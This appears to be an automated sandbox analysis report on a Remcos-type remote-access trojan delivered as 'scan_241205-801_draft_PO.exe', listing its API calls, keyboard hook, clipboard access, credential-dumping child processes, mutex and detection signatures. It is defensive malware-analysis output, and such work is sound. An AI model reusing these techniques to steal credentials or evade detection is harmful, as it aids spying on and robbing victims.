              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhvB489.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: scan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: scan_241205-801_draft_PO.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhvB489.tmp.5.drString found in binary or memory: https://www.office.com/

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\scan_241205-801_draft_PO.exeJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0041183A OpenClipboard,GetLastError,DeleteFileW,5_2_0041183A
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040987A
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004098E2
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_00406DFC
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_00406E9F
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004068B5
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000004.00000002.3267786556.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3266189424.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3267786556.00000000032DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: scan_241205-801_draft_PO.exe PID: 3872, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00401806 NtdllDefWindowProc_W,5_2_00401806
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_004018C0 NtdllDefWindowProc_W,5_2_004018C0
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004016FD NtdllDefWindowProc_A,6_2_004016FD
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004017B7 NtdllDefWindowProc_A,6_2_004017B7
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00402CAC NtdllDefWindowProc_A,7_2_00402CAC
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00402D66 NtdllDefWindowProc_A,7_2_00402D66
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341E71944_2_341E7194
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 4_2_341DB5C14_2_341DB5C1
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044B0405_2_0044B040
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0043610D5_2_0043610D
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_004473105_2_00447310
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044A4905_2_0044A490
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0040755A5_2_0040755A
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0043C5605_2_0043C560
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044B6105_2_0044B610
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044D6C05_2_0044D6C0
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_004476F05_2_004476F0
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044B8705_2_0044B870
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044081D5_2_0044081D
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_004149575_2_00414957
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_004079EE5_2_004079EE
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00407AEB5_2_00407AEB
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044AA805_2_0044AA80
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00412AA95_2_00412AA9
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00404B745_2_00404B74
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00404B035_2_00404B03
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0044BBD85_2_0044BBD8
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00404BE55_2_00404BE5
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00404C765_2_00404C76
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00415CFE5_2_00415CFE
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00416D725_2_00416D72
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00446D305_2_00446D30
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00446D8B5_2_00446D8B
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00406E8F5_2_00406E8F
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004050386_2_00405038
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0041208C6_2_0041208C
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004050A96_2_004050A9
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0040511A6_2_0040511A
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0043C13A6_2_0043C13A
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004051AB6_2_004051AB
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004493006_2_00449300
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0040D3226_2_0040D322
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0044A4F06_2_0044A4F0
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0043A5AB6_2_0043A5AB
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004136316_2_00413631
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004466906_2_00446690
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0044A7306_2_0044A730
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004398D86_2_004398D8
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_004498E06_2_004498E0
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0044A8866_2_0044A886
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0043DA096_2_0043DA09
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_00438D5E6_2_00438D5E
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_00449ED06_2_00449ED0
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_0041FE836_2_0041FE83
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 6_2_00430F546_2_00430F54
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004050C27_2_004050C2
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004014AB7_2_004014AB
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004051337_2_00405133
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004051A47_2_004051A4
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004012467_2_00401246
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_0040CA467_2_0040CA46
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004052357_2_00405235
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004032C87_2_004032C8
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004222D97_2_004222D9
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_004016897_2_00401689
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00402F607_2_00402F60
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: String function: 00416760 appears 69 times
              Source: scan_241205-801_draft_PO.exeStatic PE information: invalid certificate
              Source: scan_241205-801_draft_PO.exe, 00000000.00000002.2564689938.0000000000815000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameutmmeligheds reinspiring.exeN vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exe, 00000004.00000003.2751448358.0000000003303000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3288654881.00000000341BB000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exe, 00000004.00000000.2559501427.0000000000815000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameutmmeligheds reinspiring.exeN vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exe, 00000004.00000003.2734095731.00000000032EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exe, 00000004.00000003.2730870448.0000000033B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exeBinary or memory string: OriginalFileName vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exe, 00000005.00000000.2734396006.0000000000815000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameutmmeligheds reinspiring.exeN vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exe, 00000006.00000000.2734778938.0000000000815000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameutmmeligheds reinspiring.exeN vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exeBinary or memory string: OriginalFilename vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exe, 00000007.00000000.2735259156.0000000000815000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameutmmeligheds reinspiring.exeN vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exe, 00000007.00000002.2737204231.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exeBinary or memory string: OriginalFilenameutmmeligheds reinspiring.exeN vs scan_241205-801_draft_PO.exe
              Source: scan_241205-801_draft_PO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/19@1/3
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,5_2_004182CE
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 7_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,7_2_00410DE1
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,5_2_00418758
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,5_2_00413D4C
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeCode function: 5_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,5_2_0040B58D
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\retsplejelovenesJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile created: C:\Users\user\AppData\Local\Temp\nsz9E37.tmpJump to behavior
              Source: scan_241205-801_draft_PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: scan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: scan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: scan_241205-801_draft_PO.exe, 00000004.00000002.3288499288.00000000340B0000.00000040.10000000.00040000.00000000.sdmp, scan_241205-801_draft_PO.exe, 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: scan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: scan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: scan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: scan_241205-801_draft_PO.exe, 00000005.00000002.2747637989.00000000027A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: scan_241205-801_draft_PO.exe, scan_241205-801_draft_PO.exe, 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: scan_241205-801_draft_PO.exeReversingLabs: Detection: 34%
              Source: scan_241205-801_draft_PO.exeVirustotal: Detection: 22%
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeFile read: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_6-33207
              Source: unknownProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe"
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe "C:\Users\user\Desktop\scan_241205-801_draft_PO.exe"
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\vxhtinfano"
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\fzumjfqbbwepy"
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\itzekyavpewuiglw"
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\vxhtinfano"Jump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\fzumjfqbbwepy"Jump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeProcess created: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe C:\Users\user\Desktop\scan_241205-801_draft_PO.exe /stext "C:\Users\user\AppData\Local\Temp\itzekyavpewuiglw"Jump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\scan_241205-801_draft_PO.exeSection loaded: winnsi.dllJump to behavior
